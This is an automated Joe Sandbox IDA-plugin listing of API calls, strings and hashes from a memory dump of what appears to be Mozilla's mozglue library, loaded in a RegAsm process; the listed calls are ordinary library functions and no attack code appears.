                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70E12F
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C70E084,00000000), ref: 6C70E137
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C70E196
                                                                                    • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C70E1E9
                                                                                      • Part of subcall function 6C7099A0: GetCurrentThreadId.KERNEL32 ref: 6C7099C1
                                                                                      • Part of subcall function 6C7099A0: AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C7099CE
                                                                                      • Part of subcall function 6C7099A0: ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C7099F8
                                                                                    Strings
                                                                                    • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6C70E13F
                                                                                    Similarity
                                                                                    • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                                    • API String ID: 2491745604-3904374701
                                                                                    APIs
                                                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C6FF480
                                                                                      • Part of subcall function 6C6CF100: LoadLibraryW.KERNEL32(shell32,?,6C73D020), ref: 6C6CF122
                                                                                      • Part of subcall function 6C6CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6CF132
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6C6FF555
                                                                                      • Part of subcall function 6C6D14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C6D1248,6C6D1248,?), ref: 6C6D14C9
                                                                                      • Part of subcall function 6C6D14B0: memcpy.VCRUNTIME140(?,6C6D1248,00000000,?,6C6D1248,?), ref: 6C6D14EF
                                                                                      • Part of subcall function 6C6CEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C6CEEE3
                                                                                    • CreateFileW.KERNEL32 ref: 6C6FF4FD
                                                                                    • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C6FF523
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                    • String ID: \oleacc.dll
                                                                                    • API String ID: 2595878907-3839883404
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70E047
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70E04F
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C70E09C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C70E0B0
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_get_profile, xrefs: 6C70E057
                                                                                    Similarity
                                                                                    • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [I %d/%d] profiler_get_profile
                                                                                    • API String ID: 1832963901-4276087706
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(00000000), ref: 6C727526
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C727566
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C727597
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer$ErrorLast
                                                                                    • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                    • API String ID: 3217676052-1401603581
                                                                                    APIs
                                                                                      • Part of subcall function 6C6DBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C727A3F), ref: 6C6DBF11
                                                                                      • Part of subcall function 6C6DBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C727A3F), ref: 6C6DBF5D
                                                                                      • Part of subcall function 6C6DBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C727A3F), ref: 6C6DBF7E
                                                                                    • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C727968
                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C72A264,6C72A264), ref: 6C72799A
                                                                                      • Part of subcall function 6C6D9830: free.MOZGLUE(?,?,?,6C727ABE), ref: 6C6D985B
                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C7279E0
                                                                                    • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C7279E8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                    • String ID: sl
                                                                                    • API String ID: 3421697164-3563831378
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74F770,-00000001,?,6C73E330,?,6C6EBDF7), ref: 6C72A7AF
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C6EBDF7), ref: 6C72A7C2
                                                                                    • moz_xmalloc.MOZGLUE(00000018,?,6C6EBDF7), ref: 6C72A7E4
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F770), ref: 6C72A80A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                    • String ID: accelerator.dll
                                                                                    • API String ID: 2442272132-2426294810
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ole32,?,6C6CEE51,?), ref: 6C6CF0B2
                                                                                    • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C6CF0C2
                                                                                    Strings
                                                                                    • ole32, xrefs: 6C6CF0AD
                                                                                    • Could not find CoTaskMemFree, xrefs: 6C6CF0E3
                                                                                    • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C6CF0DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                    • API String ID: 2574300362-1578401391
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6D7235), ref: 6C7000D8
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C7000F7
                                                                                    • FreeLibrary.KERNEL32(?,6C6D7235), ref: 6C70010E
                                                                                    Strings
                                                                                    • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C7000F1
                                                                                    • wintrust.dll, xrefs: 6C7000D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                    • API String ID: 145871493-2559046807
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6D7204), ref: 6C700088
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C7000A7
                                                                                    • FreeLibrary.KERNEL32(?,6C6D7204), ref: 6C7000BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                    • API String ID: 145871493-3385133079
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6D7308), ref: 6C700178
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C700197
                                                                                    • FreeLibrary.KERNEL32(?,6C6D7308), ref: 6C7001AE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                                    • API String ID: 145871493-3354427110
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6D7297), ref: 6C700128
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C700147
                                                                                    • FreeLibrary.KERNEL32(?,6C6D7297), ref: 6C70015E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                                    • API String ID: 145871493-1536241729
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6D7266), ref: 6C7001C8
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C7001E7
                                                                                    • FreeLibrary.KERNEL32(?,6C6D7266), ref: 6C7001FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                                                    • API String ID: 145871493-1489773717
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C72C0E9), ref: 6C72C418
                                                                                    • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C72C437
                                                                                    • FreeLibrary.KERNEL32(?,6C72C0E9), ref: 6C72C44C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                    • API String ID: 145871493-2623246514
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C72748B,?), ref: 6C7275B8
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C7275D7
                                                                                    • FreeLibrary.KERNEL32(?,6C72748B,?), ref: 6C7275EC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                    • API String ID: 145871493-3641475894
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C727592), ref: 6C727608
                                                                                    • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C727627
                                                                                    • FreeLibrary.KERNEL32(?,6C727592), ref: 6C72763C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                    • API String ID: 145871493-1050664331
                                                                                    • Opcode ID: 3ee23e3c0b34e0896d2204f93ecd4bee069f1ce3480d761dbf1f2e7b078fb9d6
                                                                                    • Instruction ID: d4f1aa488d2cd5756058588523eb802d01f6fc86ef242d9214875c23dce85b42
                                                                                    • Opcode Fuzzy Hash: 3ee23e3c0b34e0896d2204f93ecd4bee069f1ce3480d761dbf1f2e7b078fb9d6
                                                                                    • Instruction Fuzzy Hash: 9CE092B4605711ABDF027FB6CE08B057EBDE75A25DF81C13BE905D1601E7B894048B14
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C72C1DE,?,00000000,?,00000000,?,6C6D779F), ref: 6C72C1F8
                                                                                    • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C72C217
                                                                                    • FreeLibrary.KERNEL32(?,6C72C1DE,?,00000000,?,00000000,?,6C6D779F), ref: 6C72C22C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: WinVerifyTrust$wintrust.dll
                                                                                    • API String ID: 145871493-2991032369
                                                                                    • Opcode ID: 171d9b78d670a92479045663f7e751b1ebee853ad3f03802fc8bd32436e7cbf0
                                                                                    • Instruction ID: a8de6fd8c5fe4c1ae3aeed98b07781a813b13bed1c83378c82823d8e65df329b
                                                                                    • Opcode Fuzzy Hash: 171d9b78d670a92479045663f7e751b1ebee853ad3f03802fc8bd32436e7cbf0
                                                                                    • Instruction Fuzzy Hash: 00E0B6B4205B519BEF007F67DA08B067EFCAB5624DF10D537AA24C6602EBB4D4008B50
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,00000000,?,?,6C72BE49), ref: 6C72BEC4
                                                                                    • RtlCaptureStackBackTrace.NTDLL ref: 6C72BEDE
                                                                                    • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C72BE49), ref: 6C72BF38
                                                                                    • RtlReAllocateHeap.NTDLL ref: 6C72BF83
                                                                                    • RtlFreeHeap.NTDLL(6C72BE49,00000000), ref: 6C72BFA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                    • String ID:
                                                                                    • API String ID: 2764315370-0
                                                                                    • Opcode ID: e894cb6da58e4892256e8c220586ca0a1af26c43a72774e0f8555cdaa01d2110
                                                                                    • Instruction ID: 037de797d28d3a4f511b4ba9e6b720ffd629a09a0c85f518df9dcc2a1c44a748
                                                                                    • Opcode Fuzzy Hash: e894cb6da58e4892256e8c220586ca0a1af26c43a72774e0f8555cdaa01d2110
                                                                                    • Instruction Fuzzy Hash: EF519471A002158FE724CF69CE80B9AB3B6FF88314F298639D556A7B55D734F9068F80
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?,6C73D734), ref: 6C718E6E
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?,6C73D734), ref: 6C718EBF
                                                                                    • free.MOZGLUE(?,?,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?), ref: 6C718F24
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?,6C73D734), ref: 6C718F46
                                                                                    • free.MOZGLUE(?,?,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?), ref: 6C718F7A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C70B58D,?,?,?,?,?,?,?,6C73D734,?,?,?), ref: 6C718F8F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: 9a6496c3065ad0fd3a192e54e31171163b1d436eb449e2c7cb5105d0f64cb984
                                                                                    • Instruction ID: dca7ded5a8f830af50f56711dfc4a8d0b908c522dd4bc018cd79ffcecb47bdb6
                                                                                    • Opcode Fuzzy Hash: 9a6496c3065ad0fd3a192e54e31171163b1d436eb449e2c7cb5105d0f64cb984
                                                                                    • Instruction Fuzzy Hash: 1D51D6B1A092168FEB10CF54D98076E73B6FF49708F2A053AD916ABB41E731F905CB91
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D60F4
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D6180
                                                                                    • free.MOZGLUE(?,?,?,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6D6211
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D6229
                                                                                    • free.MOZGLUE(?,?,?,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6D625E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6D6271
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: 819464198d302f5ecd0bdaf31b124646cafaa92f3a37d5e8188f6e1ba7905114
                                                                                    • Instruction ID: 211bfb4830b9507f967a8bb555ced15117fcd750fd435ed54bb66aabccde486f
                                                                                    • Opcode Fuzzy Hash: 819464198d302f5ecd0bdaf31b124646cafaa92f3a37d5e8188f6e1ba7905114
